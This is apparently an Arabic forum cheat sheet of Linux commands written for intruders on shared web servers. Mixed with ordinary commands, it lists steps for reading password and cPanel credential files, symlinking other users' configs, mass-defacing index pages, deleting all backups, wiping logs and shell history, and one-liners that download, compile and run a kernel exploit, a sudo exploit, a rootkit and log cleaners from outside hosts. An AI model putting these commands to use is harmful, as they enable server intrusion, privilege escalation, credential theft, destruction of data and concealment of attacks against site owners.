- جميع اوامر ( Linux )
- بسم الله الرحمن الرحيم
- اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه
- cat /etc/passwd | cut -d ":" -f1
- 1- أمر إظهار يوزرات المواقع :
- ls -la /etc/valiases
- او
- cat /etc/passwd
- او
- ls /var/mail
- او
- cat /etc/shadow
- او
- cat /etc/domainalias
- ln -s / etc/passwd w
- يسحب لك الملف بملف أسمه w
- rm angel.php <------لحذف ملف
- rm -r angel<------ لحذف مجلد
- find angel.php <------لعمل بحث عن ملف
- find *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد
- -----------------------------------------
- أمر التأكد من صلاحية سحب الملفات علي السيرفر
- which xxxx <------ بدل العلامات بأمر السحب
- xxxx = أمر السحب
- اومر السحب
- wget
- curl -o
- get
- lynx -source
- ------------------------------------
- هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد boot
- تقدر تغيير مجلد boot الى
- ----------------------------------------------
- كود:
- cd /boot;ls -al
- etc << لفحص بعض الملفات ومنها قد تجد ثغرة confixx
- usr << لمعرفة برامج السيرفر
- opt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا
- --------------------------------------------
- last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهم
- ps -ax : عرض الـ Processess
- lsmod : الـ modules الموجوده في الكيرنال
- uname -a : لعرض معلومات الكرنال
- اوامر بسيطه
- mv : تغيير الإسم
- cp : نسخ ملف
- cp -R : نسخ مجلد
- ln : إنشاء رابط ( link ) لملف
- gerp : البحث داخل ملف
- -----------------------------------
- لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي :
- netstat -an|grep 11457
- ---------------------------------------------
- امر للتاكد من وجود ملف
- كود:
- ls file
- حلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعض
- ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح
- كود:
- ls -al file
- ------------------------------------------------
- أوامر إحترافيه :
- 1- إظهار اليوزرات بشكل مرتب :
- awk -F: '{ print $1 }' / etc/passwd | sort
- 2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي )
- ps -o "%u : %U : %p : %a"
- 3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيس
- ps -eo pid,tt,user,fname,tmout,f,wchan
- 4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر )
- ps -U user -u user -N
- 5- اليوزرز المتصلين الآن
- users
- 6- عرض آخر اليوزرز اللي دخلو :
- last
- 7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر )
- finger user
- 8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم
- w
- 9- عرض البورتات المفتوحه
- netstat -lnp --ip
- -------------------------------------------
- touch angel.php ينشئ لك ملف ضمن المجلد
- ++g : كومبيلر لل C++ و C
- gcc : كومبيلر لل C++ و C
- grep : يستخدم للبحث عن شئ داخل ملف
- gzip : لضغط ملفات
- gunzip : لضغط ملفات
- وال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unzip
- haltsys : لاغلاق النظام
- cat : لعرض محتوى اكثر من ملف مع بعض
- cd : لتغير الدليل الذي انت عليه
- chmod : لتغير تصريح دخلول ملف معين
- chown : لتغير مالك ملف معين
- clear : لمسح كل الذي على الشاشة
- cmp : لمقارنة ملفين
- cp : لنسخ الملفات
- crypt : لتشفير و فك تشفير الملفات
- csplit : لتقسيم الملف الى عدة ملفات
- cu : لطلب تريمنال يونكس اخر
- whoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxx
- rm : لمسح ملفات او مجلدات ( خاليه )
- rmdir : لمسح مجلد ( خالي )
- وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكس
- ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب :
- مثال rm --help
- --------------------------------------------------
- أوامر رائعه :
- لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john )
- find /home -user john
- لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم )
- find $HOME -mtime 0
- لمعرفة المساحه المستخدمه
- df -h
- لمعرفة المساحه المتبقيه
- du
- -----------------------------------------
- وهذي مجموعة من الأوامر البسيطة
- ls -m
- يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات
- ls -t
- يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم
- ls -lu
- يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ)
- ls -F
- يظهر الملفات بأنواعها حيث :
- الملفات المسبوقة ب / عبارة عن مجلدات
- الملفات المسبوقة ب * عبارة عن ملفات تنفيذية
- الملفات المسبوقة ب @ عبارة عن روابط
- ls -S
- يظهر الملفات تسلسليا من الأكبر إلى الأصغر
- ls -X
- يظهر الملفات ويرتبها حسب امتدادها
- ls -r
- يظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....)
- cp
- لنسخ ملف أو مجلد
- mkdir
- لإنشاء مجلد
- mv
- لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته
- (مثلا
- mv angel gnom
- راح يعيد تسميت المجلد angel إلى gnom
- أو
- mv angel.php /ho me/hackteach/publi c_htm l/cc/test
- راح يحول الملف angel.php من المجلد إلي هو فيه إلى المجلد الجديد test)
- ---------------------------------------
- ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt
- راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txt
- بالعربي ,, الأمر هذا هو حق السم لينك ,, symLink
- ---------------------------------------
- أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه :
- du -s / home | sort -rn
- ( بدون مسافه بعد / و home )
- -----------------------------------
- النسخ واللصق بهالطريقة
- c p /ho me/hi.t xt /ho me/jack
- أو العكس
- ----------------------------
- لعمل ماس ديفاس بعد اخذ الروت
- كود PHP:
- find / -name "index.*" -exec cp /t mp/index.htm
- ----------------------------------------------
- أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) :
- في أوامر كثيره .. بعضها :
- find / -name service.pwd
- او
- cat / home/*/public_html/_vti_pvt/service.pwd
- و
- cat / var/cpanel/accounting.log
- ( لاتنسى تحذف المسافات قبل var و home )
- --------------------------------------------
- 1- حذف ملفات اللوقو
- rm -rf / tmp/logs
- rm -rf $HISTFILE
- rm -rf / root/.ksh_history
- rm -rf / root/.bash_history
- rm -rf / root/.ksh_history
- rm -rf / root/.bash_logout
- rm -rf / usr/local/apache/logs
- rm -rf / usr/local/apache/log
- rm -rf / var/apache/logs
- rm -rf / var/apache/log
- rm -rf / var/run/utmp
- rm -rf / var/logs
- rm -rf / var/log
- rm -rf / var/adm
- rm -rf / etc/wtmp
- rm -rf / etc/utmp
- find / -name *.bash_history -exec rm -rf {} \;
- find / -name *.bash_logout -exec rm -rf {} \;
- find / -name "log*" -exec rm -rf {} \;
- find / -name *.log -exec rm -rf {} \;
- -------------------------------------------------
- 2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن )
- cat / dev/null > / var/log/kdebug
- cat / dev/null > / var/log/kernel
- cat / dev/null > / var/log/maillog
- cat / dev/null > / var/log/messages
- cat / dev/null > / var/log/secure
- cat / dev/null > / var/log/svclog
- cat / dev/null > / var/log/tcdebuglog
- cat / dev/null > / var/log/tclient
- cat / dev/null > / var/log/tivoLog.prv
- cat / dev/null > / var/log/tivoLog.pub
- cat / dev/null > / var/log/tivoweb.log
- cat / dev/null > / var/log/tvdebuglog
- cat / dev/null > / var/log/tverr
- cat / dev/null > / var/log/tvlog
- 3- أمر قرائة ملف الكونفيج على السيرفر
- cat / usr/local/apache/conf/httpd.conf
- 4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها )
- find / -type f -perm -04000 -ls
- -------------------------------------------------
- 5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها )
- find / -type f -perm -02000 -ls
- 6- أوامر عرض المجلدات المصرح لها تصريح 777
- find / -perm -2 -ls
- find / -type d -perm 0777 | xargs ls -alld
- find / -type d -pem -2 -ls
- 7- أمر حذف جميع الباك آب الموجوده على السيرفر
- find / -name "cpbackup*" -exec rm {} ;
- find / -name "backup*" -exec rm {} ;
- 8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي
- find / -name "index.*" -exec cp index.htm {} ;
- find / -name "default.*" -exec cp index.htm {} ;
- 9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر )
- find / -name "index.*" -exec chown 99 index.html {} ;
- find / -name "default.*" -exec chown 99 index.html {} ;
- 10- أمر عرض System log
- cat / etc/syslog.conf
- 11- أمر عرض معلومات عن الذاكره
- cat / proc/meminfo
- 12- أمر تعديل دوال php والسيف مود وغيرها
- pico / usr/local/lib/php.ini
- 13- أمر عرض البورتات المفتوحه
- netstat -atup | grep IST
- 14- أمر عرض آخر إتصال
- lastlog
- 15- أمر عرض اليوزرات المتصله
- w
- --------------------------------------------------
- 16- أمر لمعرفة إصدار الكيرنال
- dpkg --list | grep linux-image
- rpm -q kernel : kernel-2.6.18-53.1.4.el5
- uname -s : SunOS
- uname -r : 2.6.22-14-EL5
- uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64
- cat / proc/version : Linux version 2.6.18-53.1.4.el5 (b@redhat.com) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 2007
- 17- أمر إيقاف process معين عن العمل
- kill -9 PID
- kill PID
- مع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمر
- ps ux
- ps aux
- top
- 18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها )
- find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null
- 19- أمر عرض اليوزرات اللتي لا تحتوي على باسورد
- cut -d: -f1,2,3 / etc/passwd | grep
- ---------------------------------------------------------------
- 20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etc
- find / etc/ -type f -perm -o+w 2> / dev/null
- 21- أمر عرض أوامر السحب المفعله كـ wget
- which wget curl w3m lynx
- 22- أمر عرض معلومات عن المعالج CPUINFO
- cat / proc/version / proc/cpuinfo
- 23- أمر عرض مساحات الهاردسك
- du
- ( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه )
- du -s / home/user | sort -rn
- df -Th
- 24- أمر التأكد من وجود المترجم gcc
- locate gcc
- 25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن )
- wget http://www.packetstormsecurity.org/U...-wipers/zap2.c | gcc zap2.c -o zap2 | ./zap2
- 26- أمر تنفيذ بعض الهجمات على الكيرنال
- wget http://ftp.powernet.com.tr/supermail/debug/k3 | ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5
- 27- إستخدام ثغرة stack overflow عن طريق sudo
- wget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit
- 28- أمر تثبيت روت كت لإصدار 2.6
- wget http://twofaced.org/linux2-6-all.c | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel
- 29- أمر استخدام سكربت Mig LogCleaner
- wget http://twofaced.org/mig-logcleaner.c | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0
- 30- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يوم
- find / -mtime x
- ( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin )
- 31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يوم
- find / -ctime x
- 32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذها
- find / -perm +4000 -user root
- 33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليها
- find / -perm +002 -user root
- 34- للبحث عن الملفات اللتي ليس لديها مالك
- find / -nouser
- 35- للبحث عن الملفات اللتي مالكها هو اليوزر root
- find / -user root
- 36- من الأوامر التفصيليه لـ find
- find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;
- شرح الأمر :
- ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txt
- وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر root
- وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي
- يستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- )
